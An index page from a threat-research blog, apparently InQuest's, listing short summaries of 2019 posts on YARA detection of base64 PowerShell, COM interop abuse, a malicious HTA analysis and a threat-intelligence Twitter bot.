InQuest Blog

Threat-hunting, malware, ransomware, vulnerability analysis and news from authors of InQuest.

Base64 Encoded Powershell Pivots

Posted on 2019-07-19 by Pedram Amini
In this short post, we share a YARA rule that threat hunters will find valuable for identifying potentially malicious Powershell pivots. Specifically, we'll be looking for base64 encoded Powershell directives. Additionally, some interesting real-world samples will be shared with the reader. Including an SSL certificate, Microsoft Windows shortcut (LNK) file, and a JPG image. Base64 encoding is among the most popular encoding mechanisms used by malware today. Decoders are available ubiquitously or are easily custom-developed when not available.

YARA For Everyone: Sharing is Caring

Posted on 2019-06-30 by William MacArthur

Abusing Registration-Free COM Interop

Posted on 2019-05-29 by Amirreza Niakanlahiji
In this short post, we dissect the inner workings of registration-free COM interop and present a known technique that red teamers can abuse to dynamically load .NET assembly logic. This technique was first presented by Casey Smith. Additionally, some minor obfuscated variations are presented in hopes of evading existing detection mechanisms.

Analysis of an Interesting Malicious HTA File

Posted on 2019-04-30 by Amirreza Niakanlahiji
In this article, we dissect an HTA file that we found in the wild. We found this instance on VirusTotal a few days back on April 12. This malware instance uses a handful of techniques notably dynamically loading a serialized .NET library and dll sideloading to evade detection mechanisms.

Making a Twitter Bot with ThreatIngestor

Posted on 2019-03-26 by Adam Musciano
What is ThreatIngestor? ThreatIngestor helps you collect threat intelligence from public feeds, and gives you context on that intelligence so you can research it further, and put it to use protecting yourself or your organization. It is located in a github repo here.
Blog Archive